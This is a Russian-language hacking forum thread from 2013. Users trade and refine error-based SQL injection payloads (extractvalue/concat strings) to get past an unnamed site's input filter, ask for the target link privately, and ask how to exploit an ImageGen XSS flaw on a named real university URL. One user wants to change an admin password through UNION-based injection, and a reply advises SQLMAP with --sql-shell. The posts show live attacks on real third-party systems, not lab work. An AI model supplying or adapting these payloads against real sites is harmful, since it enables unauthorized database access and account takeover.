11.12.2013, 18:23
|
|
Познающий
Регистрация: 02.10.2011
Сообщений: 34
С нами:
7690646
Репутация:
0
|
|
Сообщение от Inoms
Код:
name=%5c'or(extractvalue(1,concat(0x3a,user()))),1); -- w
А так ? Тоже пропускает.. пробел вроде фильтрует
и со скобкой пропускает..
|
|
|
11.12.2013, 22:06
|
|
Участник форума
Регистрация: 23.06.2013
Сообщений: 103
С нами:
6783446
Репутация:
45
|
|
Сообщение от zombak18
Тоже пропускает.. пробел вроде фильтрует
и со скобкой пропускает..
Кроме name другие параметры проходят через фильтр?
Код:
email1=asaa%40mail3.ru%5c&mail2=asaa%40mail3.ru%5c&name=,user()and(extractvalue(1,concat(0x3a,user()))),NOW());%23
Можно линк в лс?
|
|
|
|
11.12.2013, 23:35
|
|
Познающий
Регистрация: 02.10.2011
Сообщений: 34
С нами:
7690646
Репутация:
0
|
|
Сообщение от Inoms
Кроме name другие параметры проходят через фильтр?
Код:
email1=asaa%40mail3.ru%5c&mail2=asaa%40mail3.ru%5c&name=,user()and(extractvalue(1,concat(0x3a,user()))),NOW());%23
Можно линк в лс? чекни лс..
|
|
|
|
12.12.2013, 00:40
|
|
Новичок
Регистрация: 08.04.2010
Сообщений: 1
С нами:
8469890
Репутация:
0
|
|
Сообщение от zombak18
Тоже пропускает.. пробел вроде фильтрует
и со скобкой пропускает..
Убери пробел, это форум добавил.
|
|
|
|
12.12.2013, 01:13
|
|
Познающий
Регистрация: 02.10.2011
Сообщений: 34
С нами:
7690646
Репутация:
0
|
|
Сообщение от kingbeef
Убери пробел, это форум добавил.
Пропускает
если появляется другой символ кроме %5c сразу пропускает без ошибок..
|
|
|
|
12.12.2013, 12:25
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
jquery cross site scripting - Кто слышал о таких уязвимостях? Что они из себя предстовляют? Может у кого есть примеры или мануал...
|
|
|
|
12.12.2013, 17:18
|
|
Новичок
Регистрация: 22.08.2007
Сообщений: 2
С нами:
9852548
Репутация:
0
|
|
Всем привет.
Не подскажете, как эксплуатируется XSS в параметре font в Imagegen, CVE-2013-0741 (http://secunia.com/community/advisories/52771).
Например, здесь http://www.viu.ca/ImageGen.ashx?image=/homestay/galleria_photos/013.JPG&width=960
|
|
|
|
12.12.2013, 17:29
|
|
Участник форума
Регистрация: 03.06.2011
Сообщений: 288
С нами:
7864886
Репутация:
-5
|
|
как изменить пароль через sql инъекцию
по гуглив немного я нашел вот что
UPDATE – команда для изменения данных в таблице. Например у нас в таблице users есть пользователь с именем admin, нам нужно сменить его пароль, значит вводим следующее:
UPDATE users SET password = ‘qwerty’ WHERE name = admin;
помогите составить запрос
http://site.com/index.php?id=-4010'+union+select+1,2,3,pasword,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18+from+admin+--+
|
|
|
|
12.12.2013, 17:39
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2012
Сообщений: 1,266
С нами:
7388246
Репутация:
391
|
|
Сообщение от Hapk
как изменить пароль через sql инъекцию
по гуглив немного я нашел вот что
UPDATE – команда для изменения данных в таблице. Например у нас в таблице users есть пользователь с именем admin, нам нужно сменить его пароль, значит вводим следующее:
UPDATE users SET password = ‘qwerty’ WHERE name = admin;
помогите составить запрос
http://site.com/index.php?id=-4010'+union+select+1,2,3,pasword,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18+from+admin+--+
забей скулю в SQLMAP. Раскрутит - запусти с параметром --sql-shell и делай запросы как тебе удобно)
|
|
|
|
12.12.2013, 17:51
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами:
8334326
Репутация:
75
|
|
Сообщение от Hapk
как изменить пароль через sql инъекцию
по гуглив немного я нашел вот что
UPDATE – команда для изменения данных в таблице. Например у нас в таблице users есть пользователь с именем admin, нам нужно сменить его пароль, значит вводим следующее:
UPDATE users SET password = ‘qwerty’ WHERE name = admin;
помогите составить запрос
http://site.com/index.php?id=-4010'+union+select+1,2,3,pasword,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18+from+admin+--+
никак не изменишь, нельзя в запросе использовать несколько разных операторов
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
